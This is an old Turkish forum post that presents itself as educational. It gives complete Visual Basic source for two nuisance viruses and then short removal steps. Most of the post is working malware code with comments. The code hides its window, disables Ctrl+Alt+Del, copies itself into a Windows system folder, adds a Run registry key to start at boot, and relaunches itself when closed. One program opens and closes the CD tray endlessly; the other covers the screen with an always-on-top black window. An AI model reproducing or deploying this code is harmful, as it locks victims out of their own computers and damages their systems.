| |
|
13 Haziran 2011, 22:55
| #1 | |
| Çevrimdışı  IF Ticaret Sayısı: (0) | VB'de Virüs & Korunma Yolları Yazıda geçen herşey tamamen eğitim amaçlıdır. Bu yazıda örnek virüsler ve açıklamalarıyla virüs yapmayı anlatıcam .Virüslerin yapılışını anlayınca kendi korunma yöntemlerinizi üretebileceksiniz.Ama ben yine de en iyi yöntemleri yazdım. Öncelikle virüslerin ve trojanların mantığına bakalım.Maalesef bunları yararlı ve zararlı olarak ikiye ayıramıyoruz çünkü hepsi zaravermek için yazılmıştır.Bu programların belli amaçları vardır. Şimdi virüslerin amaçlarını kısaca sıralayalım 1)Bilgisayardaki bilgileri paylaşıma açık hale getirmek 2)Bulaştığı bilgisayar üzerinden kendini yaymak 3)Bilgisayarı sürü posta(spam) yapma aracı olarak kullanmak 4}Bilgisayarı kullanılmaz hale getirmek Tabii ki her virüste bunların hepsi olacak diye bir şart yok.Zaten günümüzde genelde tek bir konuda iyi fakat çok güçlü virüsler yapılıyor.İşin kötü yanı bunların çoğunu 13-15 yaş arası ÇOCUKLAR yapıyor.Örneğin ben bile 10 dakika ayırarak bilgisayar ustalarının bile çileden çıkartacak virüsler yapabilirim.Bunun için programlama kitabı almaya bile gerek yok.İnternetten bulacağınız programlama sitelerinde (dikkat edin hacker siteleri demiyorum) bulacağınız kodlara bir kaç küçük rötuşla bile çok zaralı bir virüs yapılabilir. Şimdide virüslerin neler yapabvileceğine bakalım bunları aşağıda sıraladım 1)Siz farkında olmadan bilgisayarı formatlamak 2)Antivirüsleri atlatmaya çalışmak 3)Bilgisayardaki bilgileri yaymak 4)Kendini Bilgisayar başlarken ya da belli bir programla birlikte başlatarak sürekli yaptığı işi yinelemek. Şimdi fazla zaralı olmayan ufak bir virüs örneğine bakalım. Bu virüs fazla kötü değil.Yaptığı şeyler Cd-rom u sürekli açıp kapatmak (ancak koli bandı tarzı birşey yapıştırarak durdurabilirsiniz bu da uzun vadede cd-rom a zarar vercektir.)Bu programı windows açıkken silmek ya da kapatmak imkansız.Ben kapatırım falan demeyin gerçekten imkansız ben 1,5 saat uğraştım kesinlikle kapatamıyorsunuz.Bu program bu kadar işi yapınca bilgisayarın performansınıda olumsuz yönde etkiliyor tabii.Yani yöntemi bilmeyen bir kullanıcının kurtulması imkansız. UYARI Bu forumdaki linkleri ve resimleri görebilmek için en az 25 mesajınız olması gerekir. unları ne kendi ne de başkalarının bilgisayarında çalıştırmayın.Çalıştırırsanız olcaklardan ben sorumlu değilim Oluşturmamız gerek tek öğe bir "Timer" bu öğe solda saat şeklinde zaten bunu bilmiyorsanız bundan sonrasını yapmayın.Ayrıca timer ın interval değerini 1 yapın. Bundan sonraki kodların açıklamasını ben yanlarına yazdım bu açıklamalar programı engellemez yani silmenize gerek yok. Private Declare Function mciExecute Lib "winmm.dll" (ByVal lpstrCommand As String) As Long ' Bu kod Cd rom u açıp kapatmaya yarayan özelliği tanımlıyor Private Declare Function SystemParametersInfo Lib _ 'burdaki 8 satır kod ise programı kapatmak için gereken tuş kombinasyonu yani ctrl alt del tuşlarını kapatmaya yarayan özelliği tanımlıyor "user32" Alias "SystemParametersInfoA" (ByVal uAction _ As Long, ByVal uParam As Long, ByVal lpvParam As Any, _ ByVal fuWinIni As Long) As Long Sub CtrlAltDeleteKapat(Kapali As Boolean) Dim X As Long X = SystemParametersInfo(97, Kapali, CStr(1), 0) End Sub Private Sub Form_Load() Me.Hide 'programı görünmez yapıyor On Error Resume Next 'hata olursa hatayı atlayıp sonraki koda devem etmeyi sağlıyor Call CtrlAltDeleteKapat(True) 'Yukarıda tanımladığımız ctrl alt del tuş kombinasyonunu kapatıyor FileCopy App.Path + "/" + App.EXEName + ".exe", "C:\Windows\System\DLLs\win.exe" 'kendini windows dosyaları arasına kopyalıyor aradığınızda çok ta belli olmuyor Dim KayitDefteri As Object 'end sub komutuna kadar olan bölüm ise programın windows her başladığında programın kendini yeniden açmasını sağlıyor Set KayitDefteri = CreateObject("wscript.shell") KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS \CUR R ENTVERSION\RUN\Windows", "C:\Windows\System\DLLs\win.exe", "REG_SZ" End Sub Private Sub Form_Terminate() Shell App.Path + "/" + App.EXEName + ".exe" 'program kapatılırsa kendini yeniden açıyor End Sub Private Sub Form_Unload(Cancel As Integer) Shell App.Path + "/" + App.EXEName + ".exe" 'bu da yukarıdaki ile aynı işlevde ama ben garantili olsun diye koydum End Sub Private Sub Timer1_Timer() mciExecute ("Set CDAudio door Open") 'Bu ise yukarıda bahsettiğimiz cd rom u açma özelliğini çalıştırıyor mciExecute ("Set CDAudio door closed") 'bu bölüm cd rom u kapatıyor tabii bunları üst üste yazınca cd rom sürekli açıp kapanıyor. End Sub İlk örneğimiz bitti şimdi ikinci ama en sinir edici virüse geçelim. Bu virüs için bayaa uğraşmanız gerekiyor.Ama virüslerden kurtulmak için yapmayı bilmek gerekiyor zaten antivirüs şirketlerinde yüksek yerlere gelenlerin çoğu eskiden virüs yazarlığı yapmış sakın yanlış anlamayın ben size virüs yazın demiyorum.Çünkü insanlara zara vermek hoşunuza gidiyorsa bir piskoloğa gitmenizi tavsiye ederim.Neyse konuyu dağatmayalım. İlk önce oluşturduğumuz formun özelliklerinde ki "BorderStyle" özelliğini "none" ye getirin "BackColor" ı ise siyah renk yapın daha sonra "WindowState" i ise "Maximized" yapın. Şimdi kodlara geçelim Const HWND_TOPMOST = -1 ' Hep üstte tutan değişken değer Const HWND_NOTOPMOST = -2 ' Hep üstte özelliğini yok eden değişken değer... Const SWP_NOSIZE = &H1 ' Formun boyutlarını değiştirilmez yapar... Const SWP_NOMOVE = &H2 ' Formu taşınmaz yapar... Const SWP_NOACTIVATE = &H10 ' Form Aktif yapılmaz... Const SWP_SHOWWINDOW = &H40 ' Pencere Görünür Yapılır... Private Declare Sub SetWindowPos Lib "user32" (ByVal hWnd As Long, ByVal hWndInsertAfter As Long, _ ByVal X As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) Private Declare Function SystemParametersInfo Lib _ "user32" Alias "SystemParametersInfoA" (ByVal uAction _ As Long, ByVal uParam As Long, ByVal lpvParam As Any, _ ByVal fuWinIni As Long) As Long Sub CtrlAltDeleteKapat(Kapali As Boolean) Dim X As Long X = SystemParametersInfo(97, Kapali, CStr(1), 0) End Sub Private Sub Form_Activate() SetWindowPos Me.hWnd, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOACTIVATE _ Or SWP_SHOWWINDOW Or SWP_NOMOVE Or SWP_NOSIZE End Sub Private Sub Form_Load() FileCopy App.Path + "/" + App.EXEName + ".exe", "C:\Windows\System\DLLs\win.exe" 'kendini windows dosyaları arasına kopyalıyor aradığınızda çok da belli olmuyor Call CtrlAltDeleteKapat(True) App.TaskVisible = False Dim KayitDefteri As Object 'Kendini başlata kopyalıyo Set KayitDefteri = CreateObject("wscript.shell") KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS \CUR R ENTVERSION\RUN\Windows", "C:\Windows\System\DLLs\win.exe", "REG_SZ" End Sub Private Sub Form_Terminate() shell "C:\Windows\System\DLLs\win.exe" End Sub Virüsler bitti biraz deneyimi olanlar kodları çözmüştür zaten yine de ben açıklamalarını yazdım. KORUNMA YÖNTEMLERİ Yazının başlarında da bahsettiğim gibi virüsler kendini genelde windows ile birlikte başlatır.Tabii burda programın yeride yazar. Şimdi sizi virüslerden kurtaracak yöntemleri sıralayalım : 1)Bilgisayar başlarken sürekli F8 tuşuna basın 2)Çıkan seçeneklerde güvenli kipi seçin 3)Windows açılınca "Başlat" ı açın ve orda "Çalıştır"a tıklayın "msconfig" yazın(tırnaklarıyla birlikte yazmayın). 4)Açılan pencerede Başlangıç sekmesine etkinleştirin. 5)Orada yüklemediğiniz programların çek işaretini kaldırın ama çok dikkatli olun acemi kullanıcıların bu ayarlarla oynamasını pek tavsiye etmiyorum.Şüphelendiğiniz program(lar)ın dizinini ve adını bir kağıda yazın 6)Bilgisayarı yeniden başlatın ve 1 maddeyi tekrarlayın daha sonra seçeneklerde "Sadece MS-Dos" u seçin 7)Şimdi biraz dos çalışalım klasöre erişmek için "cd" yazın boşluk bırakıp kağıda yazdığınız klasörlere teker teker girin 8)programın bulunduğu klasöre ulaştığınızda "del" yazıp boşluk bırakıp programın adını yazın ve ENTER a basın alıntı... | |
| |  |
| IRCForumlari.NET Reklamlar |
   |
 |
| Etiketler |
| korunma, vbde, virüs, yolları |
| Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir) | |
| |
Benzer Konular | ||||
| Konu | Konuyu Başlatan | Forum | Cevaplar | Son Mesaj |
| Bronşitten korunma yolları | Feronia | Sağlık Köşesi | 0 | 15 Ekim 2011 12:58 |
| HPV'den Korunma Yolları | Frozen | Erkek Sağlığı | 0 | 20 Mart 2011 19:29 |
| Gripten korunma yolları | VaLerKa | Kulak Burun Boğaz Sağlığı | 0 | 05 Aralık 2007 23:53 |
Normal
